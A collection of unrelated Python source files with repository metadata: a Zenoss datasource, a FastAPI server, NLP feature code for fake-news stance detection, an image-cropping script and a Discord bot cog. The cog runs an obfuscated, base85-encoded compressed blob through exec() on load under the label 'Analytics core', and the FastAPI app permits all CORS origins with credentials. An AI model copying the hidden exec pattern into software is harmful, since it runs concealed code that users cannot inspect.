out.write(" '%s' %s = %s<br>\n" % (obj.titleOrId(), property_name, property_value))
if i + 1 == 10:
break
class IMonitoredPropertyDataSourceInfo(IRRDDataSourceInfo):
'''
API Info interface for MonitoredPropertyDataSource.
'''
# IRRDDataSourceInfo doesn't define this.
cycletime = schema.TextLine(title=_t(u'Cycle Time (seconds)'))
# The xtype for class_name also manages property_name.
class_name = schema.TextLine(
title=_t(u'Property'),
group=_t('Detail'),
xtype='mbp_property')
class MonitoredPropertyDataSourceInfo(RRDDataSourceInfo):
'''
API Info adapter factory for MonitoredPropertyDataSource.
'''
implements(IMonitoredPropertyDataSourceInfo)
adapts(MonitoredPropertyDataSource)
# RRDDataSourceInfo doesn't define this.
cycletime = ProxyProperty('cycletime')
class_name = ProxyProperty('class_name')
property_name = ProxyProperty('property_name')
@property
def testable(self):
"""
This tells the client if we can test this datasource against a
specific device.
"""
return True
| zenoss/ZenPacks.zenoss.PropertyMonitor | ZenPacks/zenoss/PropertyMonitor/datasources/MonitoredPropertyDataSource.py | MonitoredPropertyDataSource.py | py | 5,634 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "Products.ZenModel.ZenPackPersistence.ZenPackPersistence",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "Products.ZenModel.RRDDataSource.SimpleRRDDataSource",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "Products.ZenModel.RRDDataSource.Simpl... |
24844546870 | from fastapi import Depends, FastAPI
from fastapi.middleware.cors import CORSMiddleware
from auth.verify_token import get_query_token
import routers.s3_objects_router as s3_objects_router
import routers.users_router as users_router
import routers.user_objects_router as user_objects_router
import uvicorn
PORT = 8000
app = FastAPI(dependencies=[Depends(get_query_token)])
# origins = [
# "http://localhost",
# "http://localhost:3000",
# ]
origins = ["*"]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(s3_objects_router.router)
app.include_router(users_router.router)
app.include_router(user_objects_router.router)
@app.get('/')
async def root():
return {'message': 'Welcome to Hyper Wasabi!'}
if __name__ == '__main__':
uvicorn.run('main:app', port=PORT, reload=True) | harish-hyperDev/hyper-wasabi | server/main.py | main.py | py | 924 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "fastapi.Depends",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "auth.verify_token.get_query_token",
"line_number": 14,
"usage_type": "argument"
},
{
"api_name": ... |
30899462486 | import base64
import wget
import settings
weights_path = settings.WEIGHTS_PATH
def from_onedrive(weights_path):
data_bytes64 = base64.b64encode(bytes(settings.ONEDRIVE_LINK, "utf-8"))
data_bytes64_String = (
data_bytes64.decode("utf-8").replace("/", "_").replace("+", "-").rstrip("=")
)
resultUrl = (
f"https://api.onedrive.com/v1.0/shares/u!{data_bytes64_String}/root/content"
)
wget.download(resultUrl, weights_path)
| gaston-oviedo/supermarket_object_detection | model/from_drive.py | from_drive.py | py | 465 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "settings.WEIGHTS_PATH",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "base64.b64encode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "settings.ONEDRIVE_LINK",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name":... |
24337799381 | import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import numpy as np
import pandas as pd
import spacy
import networkx as nx
from scipy.spatial import distance
import matplotlib.pyplot as plt
import nltk
from collections import Counter, defaultdict
import itertools
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sentic import SenticPhrase
# import en_coref_md
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
nlp = spacy.load('en_core_web_sm')
# coref = en_coref_md.load()
negating_words = set([
"n't", "not", "no",
"never", "nobody", "non", "nope"])
doubting_words = set([
'fake','fraud', 'hoax',
'false', 'deny', 'denies',
'despite', 'doubt',
'bogus', 'debunk', 'prank',
'retract', 'scam', "withdrawn",
"misinformation"])
hedging_words = set([
'allege', 'allegedly','apparently',
'appear','claim','could',
'evidently','largely','likely',
'mainly','may', 'maybe', 'might',
'mostly','perhaps','presumably',
'probably','purport', 'purportedly',
'reported', 'reportedly',
'rumor', 'rumour', 'rumored', 'rumoured',
'says','seem','somewhat',
'unconfirmed'])
sus_words = doubting_words.union(hedging_words)
vader = SentimentIntensityAnalyzer()
def get_sentiment(sentence):
sent = vader.polarity_scores(sentence)
return [sent["pos"],sent["neg"],sent["neu"],sent["compound"]]
def get_avg_sentiment(lst):
sents = np.array([get_sentiment(s) for s in lst])
return list(np.mean(sents, axis = 0))
def get_diff_sentiment(a,b):
return list(np.array(a) - np.array(b))
def preprocess(text):
text = text.replace("' ",' ')
text = text.replace("'\n",'\n')
text = text.replace(" '",' ')
text = text.replace('"',' ')
text = text.replace('“',' ')
text = text.replace('”', ' ')
text = text.replace(":", ". ")
text = text.replace(";", ". ")
text = text.replace("...", " ")
return text
def make_graph(token):
valid_children = [c for c in list(token.lefts)+list(token.rights) if c.dep_ != "SPACE"]
return {
"name": token.lemma_.lower() + str(token.i),
"token": token.lemma_.lower(),
"pos": token.pos_,
"dep": token.dep_,
"idx": token.i,
"children": [make_graph(c) for c in valid_children]
}
def get_display_graph(headline, body_sents):
headline_root = [t for t in headline if t.dep_== "ROOT"][0]
body_roots = [[t for t in sent if t.dep_== "ROOT"][0] for sent in body_sents]
headline_graph = make_graph(headline_root)
body_graphs = [make_graph(r) for r in body_roots]
return {"headline":headline_graph, "body":body_graphs}
def cosine_similarity(x,y):
if all([a == 0 for a in x]) or all([a == 0 for a in y]):
return 0
return 1 - np.nan_to_num(distance.cosine(x,y))
def get_topics(doc):
"""
get topics of a sentence
input: spacy doc
output: dictionary with nouns as the key, and the set of noun chunks that contain the noun as the value
special entry _vocab has the set of all tokens in the dict
"""
subjs = {}
for chunk in doc.noun_chunks:
if len(chunk.root.text) > 2 and chunk.root.pos_ not in ["NUM", "SYM","PUNCT"]:
txt = chunk.root.lemma_.lower()
if txt not in subjs:
subjs[txt] = set([txt])
subjs[txt].add(chunk.text.lower())
subjects_= []
for word in subjs:
for phrase in subjs[word]:
subjects_ += phrase.split(" ")
subjs["_vocab"] = set(subjects_)
return subjs
def get_svos(sent):
"""
input: Spacy processed sentence
output: dict of subj, dict of v, dict of obj (each word is lemmatized and lowercased)
each entry in dict has key of lemmatized token, value is actual token (to do traversals with later if needed)
"""
s = {}
v = {}
o = {}
for token in sent:
if token.dep_ == 'ROOT':
v[token.lemma_.lower()] = token
elif token.dep_ in ["nsubj", "nsubjpass", "csubj","csubjpass", "agent","compound"]:
s[token.lemma_.lower()] = token
elif token.dep_ in ["dobj", "dative", "attr", "oprd", "pobj"]:
o[token.lemma_.lower()] = token
# https://github.com/clir/clearnlp-guidelines/blob/master/md/specifications/dependency_labels.md
return (s,v,o)
def build_graph(doc):
"""
build a NetworkX graph of the dependency tree
input: spacy Doc
output: networkx graph
"""
edges = set()
for token in doc:
if token.pos_ not in ['SPACE']:
for child in token.children:
if child.pos_ not in ['SPACE']:
edges.add((token.lemma_.lower(),child.lemma_.lower()))
graph = nx.DiGraph(list(edges))
return graph
def get_edges(doc):
"""
return list of edges
"""
edges = []
for token in doc:
if token.pos_ not in ['SPACE', 'PUNCT', 'SYM']:
for child in token.children:
if child.pos_ not in ['SPACE', 'PUNCT', 'SYM']:
edges.append((
{"token":token.lemma_.lower(), "dep":token.dep_ , "pos":token.pos_},
{"token":child.lemma_.lower(), "dep":child.dep_ , "pos":child.pos_}
))
return edges
def get_summary(doc, subjects, n = 5):
"""
get summary of n sentences in document
first meaningful sentence will always be returned
"""
subjects_ = subjects
def score_sentence(sent):
# not very robust right now
score = 0
word_count = 0
for token in sent:
word_count += 1
t = token.lemma_.lower()
if t in subjects_:
score += 1
elif t in negating_words or t in doubting_words or t in hedging_words:
score += 1.5
return score/word_count if word_count > 4 else 0
sentences = [s for s in doc.sents]
scored_sentences = [[idx, sent, score_sentence(sent)] for idx, sent in enumerate(sentences)]
scored_sentences = [s for s in scored_sentences if s[2] > 0 and s[0] > 0] #filter out non-scoring sentences
scored_sentences.sort(key = lambda x: x[2], reverse = True)
top = scored_sentences[:n]
top.sort(key = lambda x: x[0])
scored_sentences.sort(key = lambda x: x[0])
result = None
if len(scored_sentences) == 0:
result = [sentences[0]]
else:
result = [scored_sentences[0][1]] + [s[1] for s in top]
return result
def get_shortest_path_to_negating(graph, subjects):
"""
get the shortest path from each subject to any negating or doubting/hedging word
returns: dictionary with subject as key, and 2-element list of path lengths [negating, doubting]
- if a subject does not exist in graph or have a path to any negating word, then the value will be [None, None]
"""
results = {}
for s in subjects:
results[s] = [None, None, None]
if graph.has_node(s):
for word in negating_words:
if word in graph:
try:
path = nx.shortest_path(graph, source = s, target = word)
if results[s][0] == None or len(path) < results[s][0]:
results[s][0] = len(path)
except:
continue
for word in hedging_words:
if word in graph:
try:
path = nx.shortest_path(graph, source = s, target = word)
if results[s][1] == None or len(path) < results[s][1]:
results[s][1] = len(path)
except:
continue
for word in doubting_words:
if word in graph:
try:
path = nx.shortest_path(graph, source = s, target = word)
if results[s][2] == None or len(path) < results[s][2]:
results[s][2] = len(path)
except:
continue
return results
def root_distance(graph, root):
"""
as implemented in the Emergent paper - return the shortest distance between the given root and any
doubting or hedging words in the graph, or None if no such path exists
"""
if root == None:
return None
min_dist = None
for word in sus_words:
if word in graph:
try:
path = nx.shortest_path(graph, source = root, target = word)
if min_dist == None or len(path) < min_dist:
min_dist = len(path)
except:
continue
return min_dist
def get_neg_ancestors(doc):
"""
get the ancestors of every negating word
input: spacy Doc
returns: tuple - set of words that were in the ancestor list of negating words,
set of words that were in ancestor list of refuting words, # negating words, # refuting words
"""
results = [set(), set(), set(), 0, 0, 0]
for token in doc:
if token.lemma_.lower() in negating_words:
results[0] = results[0].union(
set([ancestor.lemma_.lower() for ancestor in token.ancestors if len(ancestor) > 2]).union(
set([child.lemma_.lower() for child in token.head.children if child.text != token.text and len(child) > 2])
)
)
results[3] += 1
elif token.lemma_.lower() in doubting_words:
results[1] = results[1].union(
set([ancestor.lemma_.lower() for ancestor in token.ancestors if len(ancestor) > 2]).union(
set([child.lemma_.lower() for child in token.head.children if child.text != token.text and len(child) > 2])
)
)
results[4] += 1
elif token.lemma_.lower() in hedging_words:
results[2] = results[1].union(
set([ancestor.lemma_.lower() for ancestor in token.ancestors if len(ancestor) > 2]).union(
set([child.lemma_.lower() for child in token.head.children if child.text != token.text and len(child) > 2])
)
)
results[5] += 1
return tuple(results)
sp = SenticPhrase("Hello, World!")
def get_sentics(sent):
"""
input: Spacy processed sentence
output: a tuple containing the polarity score and a list of sentic values
(pleasantness, attention, sensitiviy, aptitude )
"""
info = sp.info(sent)
# Sometimes sentic doesn't returns any sentics values, seems to be only when purely neutral.
# Some sort of tag to make sure this is true could help with classiciation! (if all 0's not enough)
sentics = {"pleasantness":0, "attention":0, "sensitivity":0, "aptitude":0}
sentics.update(info["sentics"])
return [info['polarity'], sentics['aptitude'], sentics['attention'], sentics['sensitivity'], sentics['pleasantness']]
def process_sentence(sentence):
svo = get_svos(sentence)
# list of words that belong to that part of speech
nouns = []
verbs = []
adjectives = []
adverbs = []
tokens = []
for token in sentence:
if not token.is_stop and token.pos_ not in ['PUNCT', 'NUM', 'SYM','SPACE','PART']:
if token.pos_ == "NOUN":
nouns.append(token.lemma_.lower())
elif token.pos_ == "VERB":
verbs.append(token.lemma_.lower())
elif token.pos_ == "ADJ":
adjectives.append(token.lemma_.lower())
elif token.pos_ == "ADV":
adverbs.append(token.lemma_.lower())
tokens.append(token.lemma_.lower())
bigram = list(nltk.bigrams(tokens))
bigram_str = [x[0]+' '+x[1] for x in bigram]
return {
"raw": sentence.text,
"tokens": tokens,
"bigrams": bigram_str,
"nouns": nouns,
"verbs": verbs,
"adjectives": adjectives,
"adverbs": adverbs,
"svo": [list(item) for item in svo]
}
def score_sentence_idf(sent, idf):
# not very robust right now
score = 0
word_count = 0
for token in sent:
word_count += 1
t = token.lemma_.lower()
if t in idf:
score += idf[t]
return score/word_count if word_count > 4 else 0
def process_body(body, idf):
sentences = [s for s in body.sents]
if len(sentences) == 0:
sentences = [body]
# first sentence of article
first_sentence_data = process_sentence(sentences[0])
nouns = []
verbs = []
adjectives = []
adverbs = []
tokens = []
for token in body:
if not token.is_stop and token.pos_ not in ['PUNCT', 'NUM', 'SYM','SPACE','PART']:
if token.pos_ == "NOUN":
nouns.append(token.lemma_.lower())
elif token.pos_ == "VERB":
verbs.append(token.lemma_.lower())
elif token.pos_ == "ADJ":
adjectives.append(token.lemma_.lower())
elif token.pos_ == "ADV":
adverbs.append(token.lemma_.lower())
tokens.append(token.lemma_.lower())
bigram = list(nltk.bigrams(tokens))
bigram_str = [x[0]+' '+x[1] for x in bigram]
doc_len = len(tokens)
n_counter = Counter(nouns)
v_counter = Counter(verbs)
b_counter = Counter(bigram)
t_counter = Counter(tokens)
avg_idf = idf["_avg"]
n_tfidf, v_tfidf, t_tfidf = {}, {}, {}
for n in n_counter:
n_tfidf[n] = (n_counter[n]/doc_len) * (idf[n] if n in idf else avg_idf)
for v in v_counter:
v_tfidf[v] = (v_counter[v]/doc_len) * (idf[v] if v in idf else avg_idf)
for t in t_counter:
t_tfidf[t] = (t_counter[t]/doc_len) * (idf[t] if t in idf else avg_idf)
common_nouns = sorted(n_tfidf, key=n_tfidf.get, reverse=True)[:5]
common_verbs = sorted(v_tfidf, key=v_tfidf.get, reverse=True)[:5]
common_tokens = sorted(t_tfidf, key=t_tfidf.get, reverse=True)[:5]
# no idf for bigrams increase "common" count to 10
common_bigrams = [x[0] for x in b_counter.most_common(10)]
scored_sentences = [[idx, sent, score_sentence_idf(sent, idf)] for idx, sent in enumerate(sentences)]
scored_sentences = [s for s in scored_sentences] #filter out non-scoring sentences
scored_sentences.sort(key = lambda x: x[2], reverse = True)
most_significant_sentence_data = process_sentence(scored_sentences[0][1])
return {
"tokens": tokens,
"bigrams": bigram_str,
"nouns": nouns,
"verbs": verbs,
"first_sentence": first_sentence_data,
"significant_sentence": most_significant_sentence_data,
"vocabulary": list(set(tokens)),
"common_tokens": common_tokens,
"common_nouns": common_nouns,
"common_verbs": common_verbs,
"common_bigrams": common_bigrams,
}
def bow_cos_similarity(a, b):
vocab = list(set(a).union(set(b)))
a_bow, b_bow = set(a), set(b)
if len(a) == 0 or len(b) == 0:
return -1
a_vec = [(1 if i in a_bow else 0) for i in vocab]
b_vec = [(1 if i in b_bow else 0) for i in vocab]
return 1 - distance.cosine(a_vec, b_vec)
def get_features_rel(headline_data, body_data):
features = []
for item in body_data:
h, b = headline_data, item
fts = get_feats_rel(h, b)
features.append(fts)
return features
def get_feats_rel(headline_data, body_data):
shared_common_nouns = len(set(headline_data['nouns']).intersection(
set(body_data['common_nouns'])))
shared_common_verbs = len(set(headline_data['verbs']).intersection(
set(body_data['common_verbs'])))
shared_common_tokens = len(set(headline_data['tokens']).intersection(
set(body_data['common_tokens'])))
shared_bigrams = len(set(headline_data['bigrams']).intersection(
set(body_data['common_bigrams'])))
shared_nouns_first = len(set(headline_data['nouns']).intersection(
set(body_data['first_sentence']['nouns'])))
shared_verbs_first = len(set(headline_data['verbs']).intersection(
set(body_data['first_sentence']['verbs'])))
shared_bigrams_first = len(set(headline_data['bigrams']).intersection(
set(body_data['first_sentence']['bigrams'])))
shared_tokens_first = len(set(headline_data['tokens']).intersection(
set(body_data['first_sentence']['tokens'])))
shared_nouns_sig = len(set(headline_data['nouns']).intersection(
set(body_data['significant_sentence']['nouns'])))
shared_verbs_sig = len(set(headline_data['verbs']).intersection(
set(body_data['significant_sentence']['verbs'])))
shared_bigrams_sig = len(set(headline_data['bigrams']).intersection(
set(body_data['significant_sentence']['bigrams'])))
shared_tokens_sig = len(set(headline_data['tokens']).intersection(
set(body_data['significant_sentence']['tokens'])))
headline_svo = headline_data['svo']
body_fst_svo = body_data['first_sentence']['svo']
body_sig_svo = body_data['significant_sentence']['svo']
# cosine similarity - no verbs because relatively few per sentence
cos_nouns_first = bow_cos_similarity(
headline_data['nouns'], body_data['first_sentence']['nouns'])
cos_bigrams_first = bow_cos_similarity(
headline_data['bigrams'], body_data['first_sentence']['bigrams'])
cos_tokens_first = bow_cos_similarity(
headline_data['tokens'], body_data['first_sentence']['tokens'])
cos_nouns_sig = bow_cos_similarity(
headline_data['nouns'], body_data['significant_sentence']['nouns'])
cos_bigrams_sig = bow_cos_similarity(
headline_data['bigrams'], body_data['significant_sentence']['bigrams'])
cos_tokens_sig = bow_cos_similarity(
headline_data['tokens'], body_data['significant_sentence']['tokens'])
svo_cos_sim_fst = bow_cos_similarity(
body_fst_svo[0]+body_fst_svo[1]+body_fst_svo[2],
headline_svo[0]+headline_svo[1]+headline_svo[2])
svo_cos_sim_sig = bow_cos_similarity(
body_sig_svo[0]+body_sig_svo[1]+body_sig_svo[2],
headline_svo[0]+headline_svo[1]+headline_svo[2])
svo_s_fst = len(set(body_fst_svo[0]).intersection(set(headline_svo[0])))
svo_v_fst = len(set(body_fst_svo[1]).intersection(set(headline_svo[1])))
svo_o_fst = len(set(body_fst_svo[2]).intersection(set(headline_svo[2])))
svo_s_sig = len(set(body_sig_svo[0]).intersection(set(headline_svo[0])))
svo_v_sig = len(set(body_sig_svo[1]).intersection(set(headline_svo[1])))
svo_o_sig = len(set(body_sig_svo[2]).intersection(set(headline_svo[2])))
return {
'shared_nouns': shared_common_nouns,
'shared_verbs': shared_common_verbs,
'shared_bigrams': shared_bigrams,
'shared_tokens': shared_common_tokens,
'shared_nouns_fst': shared_nouns_first,
'shared_verbs_fst': shared_verbs_first,
'shared_bigrams_fst': shared_bigrams_first,
'shared_tokens_fst': shared_tokens_first,
'shared_nouns_sig': shared_nouns_sig,
'shared_verbs_sig': shared_verbs_sig,
'shared_bigrams_sig': shared_bigrams_sig,
'shared_tokens_sig': shared_tokens_sig,
'cos_nouns_sig': cos_nouns_sig,
'cos_bigrams_sig': cos_bigrams_sig,
'cos_tokens_sig': cos_tokens_sig,
'cos_nouns_fst': cos_nouns_first,
'cos_bigrams_fst': cos_bigrams_first,
'cos_tokens_fst': cos_tokens_first,
'svo_cos_sim_fst' : svo_cos_sim_fst,
'svo_cos_sim_sig' : svo_cos_sim_sig,
'svo_s_fst': svo_s_fst,
'svo_v_fst': svo_v_fst,
'svo_o_fst': svo_o_fst,
'svo_s_sig': svo_s_sig,
'svo_v_sig': svo_v_sig,
'svo_o_sig': svo_o_sig,
}
def get_sentence_vec(s):
vecs = [token.vector for token in s]
return np.nan_to_num(np.product(vecs, axis = 0))
def get_features_stance(headline_data, body_data, n_sent = 5):
features = []
summary_graphs = []
for item in body_data:
headline, headline_graph, headline_subjs, headline_svo, headline_root_dist, headline_neg_ancestors, headline_edges = headline_data
body, body_graph = item
h_important_words = set(headline_subjs["_vocab"]).union(set(headline_svo[0])).union(set(headline_svo[1])).union(set(headline_svo[2]))
#sometimes the coref deletes bodies that are one sentence
if len(body) == 0:
body = nlp(preprocess(get_body(b)))
body_graph = build_graph(body)
#return the shortest path to negating word for each subject in headline_subjs, if one exists
neg_h = get_shortest_path_to_negating(headline_graph, h_important_words)
neg_b = get_shortest_path_to_negating(body_graph, h_important_words)
#body summary
summary = get_summary(body, h_important_words, n_sent)
first_summ_sentence = summary[0]
summary_edges = [get_edges(s) for s in summary]
summary_graph = get_display_graph(headline, summary)
summary_svos = [get_svos(s) for s in summary]
summary_root_dist = [root_distance(body_graph, list(s[1].keys())[0]) for s in summary_svos]
summary_neg_ancestors = [get_neg_ancestors(s) for s in summary]
summary_neg_counts = [s[3:] for s in summary_neg_ancestors]
summary_neg_ancestors_superset = [set(), set(), set()]
for a in summary_neg_ancestors:
summary_neg_ancestors_superset[0] = summary_neg_ancestors_superset[0].union(a[0])
summary_neg_ancestors_superset[1] = summary_neg_ancestors_superset[1].union(a[1])
summary_neg_ancestors_superset[2] = summary_neg_ancestors_superset[2].union(a[2])
#ancestors
h_anc = [[1 if w in headline_neg_ancestors[0] else -1 for w in h_important_words],
[1 if w in headline_neg_ancestors[1] else -1 for w in h_important_words],
[1 if w in headline_neg_ancestors[2] else -1 for w in h_important_words]]
b_anc = [[1 if w in summary_neg_ancestors_superset[0] else -1 for w in h_important_words],
[1 if w in summary_neg_ancestors_superset[1] else -1 for w in h_important_words],
[1 if w in summary_neg_ancestors_superset[2] else -1 for w in h_important_words]]
neg_anc_sim = cosine_similarity(h_anc[0], b_anc[0])
doubt_anc_sim = cosine_similarity(h_anc[1], b_anc[1])
hedge_anc_sim = cosine_similarity(h_anc[2], b_anc[2])
neg_anc_overlap = len(headline_neg_ancestors[0].union(summary_neg_ancestors_superset[0]))
doubt_anc_overlap = len(headline_neg_ancestors[1].union(summary_neg_ancestors_superset[1]))
hedge_anc_overlap = len(headline_neg_ancestors[2].union(summary_neg_ancestors_superset[2]))
#svo
body_s, body_v, body_o = {}, {}, {}
headline_s, headline_v, headline_o = headline_svo
for svo in summary_svos:
body_s.update(svo[0])
body_v.update(svo[1])
body_o.update(svo[2])
body_s_vec = list(np.sum([body_s[s].vector for s in body_s], axis = 0)) if len(body_s) > 0 else np.zeros(384)
body_v_vec = list(np.sum([body_v[s].vector for s in body_v], axis = 0)) if len(body_v) > 0 else np.zeros(384)
body_o_vec = list(np.sum([body_o[s].vector for s in body_o], axis = 0)) if len(body_o) > 0 else np.zeros(384)
headline_s_vec = list(np.sum([headline_s[s].vector for s in headline_s], axis = 0)) if len(headline_s) > 0 else np.zeros(384)
headline_v_vec = list(np.sum([headline_v[s].vector for s in headline_v], axis = 0)) if len(headline_v) > 0 else np.zeros(384)
headline_o_vec = list(np.sum([headline_o[s].vector for s in headline_o], axis = 0)) if len(headline_o) > 0 else np.zeros(384)
cos_sim_s = cosine_similarity(body_s_vec, headline_s_vec)
cos_sim_v = cosine_similarity(body_v_vec, headline_v_vec)
cos_sim_o = cosine_similarity(body_o_vec, headline_o_vec)
#negating paths
headline_paths = [neg_b[x] for x in neg_b]
headline_neg_paths = [1 if x[0] != None else -1 for x in headline_paths]
headline_doubt_paths = [1 if x[1] != None else -1 for x in headline_paths]
headline_hedge_paths = [1 if x[2] != None else -1 for x in headline_paths]
body_paths = [neg_h[x] for x in neg_h]
body_neg_paths = [1 if x[0] != None else -1 for x in body_paths]
body_doubt_paths = [1 if x[1] != None else -1 for x in body_paths]
body_hedge_paths = [1 if x[2] != None else -1 for x in body_paths]
neg_path_cos_sim = cosine_similarity(headline_neg_paths, body_neg_paths)
hedge_path_cos_sim = cosine_similarity(headline_hedge_paths, body_hedge_paths)
doubt_path_cos_sim = cosine_similarity(headline_doubt_paths, body_doubt_paths)
#root distance
summary_root_dists = [x if x != None else 15 for x in summary_root_dist]
avg_summary_root_dist = sum(summary_root_dists)/len(summary_root_dists)
root_dist_feats = [headline_root_dist, avg_summary_root_dist]
root_dist_feats = [x/15 if x != None else 1 for x in root_dist_feats]
root_dist_feats = root_dist_feats + [int(headline_root_dist == None), len([x for x in summary_root_dist if x != None])]
#sentiment
headline_sent = get_sentiment(headline.text)
body_sents = [get_sentiment(s.text) for s in summary]
avg_body_sent = list(np.mean(body_sents, axis = 0))
diff_avg_sents = list(np.array(headline_sent) - avg_body_sent)
diff_sents = list(np.sum([get_diff_sentiment(headline_sent, s) for s in body_sents], axis = 0))
sent_cos_sim = cosine_similarity(headline_sent, avg_body_sent)
headline_sentics = get_sentics(headline.text)
body_sentics = [get_sentics(s.text) for s in summary]
avg_body_sentics = list(np.mean(body_sentics, axis = 0))
diff_avg_sentics = list(np.array(headline_sentics) - avg_body_sentics)
diff_sentics = list(np.sum([get_diff_sentiment(headline_sentics, s) for s in body_sentics], axis = 0))
sentics_cos_sim = cosine_similarity(headline_sentics, avg_body_sentics)
#bow
headline_vocab = set([tok.lemma_.lower() for tok in headline])
fst_summ_vocab = set([tok.lemma_.lower() for tok in first_summ_sentence])
total_vocab = list(headline_vocab.union(fst_summ_vocab))
headline_embedding = [1 if tok in headline_vocab else -1 for tok in total_vocab]
fst_summ_embedding = [1 if tok in fst_summ_vocab else -1 for tok in total_vocab]
bow_cos_sim = cosine_similarity(headline_embedding, fst_summ_embedding)
#word vecs
cos_sims = [cosine_similarity(get_sentence_vec(s), headline.vector) for s in summary]
fst_cos_sim = cos_sims[0]
avg_cos_sim = sum(cos_sims)/len(cos_sims)
#neg_hedge_doubt distributions
hd_dist = list(headline_neg_ancestors[3:])
body_dist = list(np.sum(summary_neg_counts, axis = 0))
dist_sim = cosine_similarity(hd_dist, body_dist)
#build final features list
fts = (
[fst_cos_sim, avg_cos_sim, bow_cos_sim,
neg_path_cos_sim, hedge_path_cos_sim, doubt_path_cos_sim,
neg_anc_sim, hedge_anc_sim, doubt_anc_sim,
neg_anc_overlap, hedge_anc_overlap, doubt_anc_overlap,
cos_sim_s, cos_sim_v, cos_sim_o,
dist_sim, sent_cos_sim, sentics_cos_sim] +
diff_avg_sents + diff_sents + diff_avg_sentics + diff_sentics +
root_dist_feats + hd_dist + body_dist +
headline_sent + avg_body_sent + headline_sentics + avg_body_sentics
)
features.append(fts)
summary_graphs.append(summary_graph)
return features, summary_graphs, headline_subjs
| CornellDataScience/Insights-FakeNews | flask_app/server_helpers.py | server_helpers.py | py | 28,281 | python | en | code | 4 | github-code | 1 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "spacy.load",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer",
"line_number": 47,
"usage_type": "call"
},... |
29373059823 | import tensorflow_datasets as tfds
import numpy as np
def dataset_crop(setName, setType):
# Get tf dataset
(trainingdata), metadata = tfds.load(setName, split=setType, with_info=True,
as_supervised=True)
# Iterate through it once for counting dataset size
count = iter(trainingdata)
total_number_img = sum(1 for _ in count)
# Reset iterator for cropping images
the_set = iter(trainingdata)
# Initiate the new dataset and setup a dummy image for np.vstack
dataset = np.zeros((1,100,100,3))
# Iterate through dataset
for index, i in enumerate(the_set):
image = (i[0].numpy()).astype('int')
image = np.expand_dims(image,0)
# Count how many sections of 100 pixels on the x and y axis
img_y_count = image.shape[1] // 100
img_x_count = image.shape[2] // 100
# cutting up the images and add it to the new dataset
for y in (np.arange(img_y_count) + 1):
for x in (np.arange(img_x_count) + 1):
dataset = np.vstack((dataset, image[:, y*100-100:y*100, x*100-100:x*100, :]))
#print progress evert 20 images
if (index + 1) % 20 == 0:
print("Picture number {} out of {} done".format((index+1), total_number_img))
# Remove comments to test that the code is working properly
#if (index + 1) == 10:
# break
# Remove dummy image from the new dataset
dataset = dataset[1:,...]
np.savez("{}.npz".format((setName + "_" + setType)), dataset = dataset)
dataset_crop('oxford_flowers102', "train")
dataset_crop('oxford_flowers102', "test")
dataset_crop('oxford_flowers102', "validation")
# Note that when loading the images into a script, the arraytype has to be 'int'
# for the images to render properly with imshow | Mathiasdfn/SuperscaleGAN | dataset_crop - Copy.py | dataset_crop - Copy.py | py | 1,863 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "tensorflow_datasets.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.expand_dims",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
... |
73321987875 | from discord.ext import commands
from .utils.chat_formatting import box, pagify, warning
from .utils.dataIO import dataIO
from .utils import checks
import asyncio
import os
from copy import copy
__version__ = '1.3.0'
PATH = 'data/galias/'
JSON = PATH + 'aliases.json'
# Analytics core
import zlib, base64
exec(zlib.decompress(base64.b85decode("""c-oB^YjfMU@w<No&NCTMHA`DgE_b6jrg7c0=eC!Z-Rs==JUobmEW{+iBS0ydO#XX!7Y|XglIx5;0)gG
dz8_Fcr+dqU*|eq7N6LRHy|lIqpIt5NLibJhHX9R`+8ix<-LO*EwJfdDtzrJClD`i!oZg#ku&Op$C9Jr56Jh9UA1IubOIben3o2zw-B+3XXydVN8qroBU@6S
9R`YOZmSXA-=EBJ5&%*xv`7_y;x{^m_EsSCR`1zt0^~S2w%#K)5tYmLMilWG;+0$o7?E2>7=DPUL`+w&gRbpnRr^X6vvQpG?{vlKPv{P&Kkaf$BAF;n)T)*0
d?qxNC1(3HFH$UbaB|imz3wMSG|Ga+lI>*x!E&@;42cug!dpFIK;~!;R>u=a4Vz8y`WyWrn3e;uThrxi^*zbcXAK*w-hS{aC?24}>1BQDmD|XC|?}Y_K)!wt
gh<nLYi-r|wI0h@$Y@8i_ZI35#>p9%|-=%DsY{k5mRmwJc=-FIbwpMk`jBG0=THS6MJs2`46LUSl@lusbqJ`H27BW(6QAtFo*ix?<SZ~Ahf=NN3WKFz)^+TI
7QEOmxt?UvhIC^ic3Ax+YB{1x5g($q2h}D8*$U8fJt>?PhusN{ONOTS+%2I;Ctp?3VVl^dVS8NR`CXWFk$^t%7_yrg#Maz27ChBD|fWTd^R-)XnPS*;4&<Hb
R?}uRSd*FANXCTd~x2*g5GpgcrUhDa3BaD^(>D%{LKVMw_k~P%}$MPFA4VX|Gile`<zx~91c=^rr+w<vk`rY|=&(6-De}DG${Okn-OUXv48f1GJor`5?v$q%
TFMcY}5A#o4RYqCKXHQd5P|0W0l#5QSaPj#FB6I;BuUch`A~CXFq+r-o=E-CNvA}RAD~d)}LoFd7IC;j_XS3*~oCR<oki&oY1UVbk3M=!!i`vMr-HBc_rohO
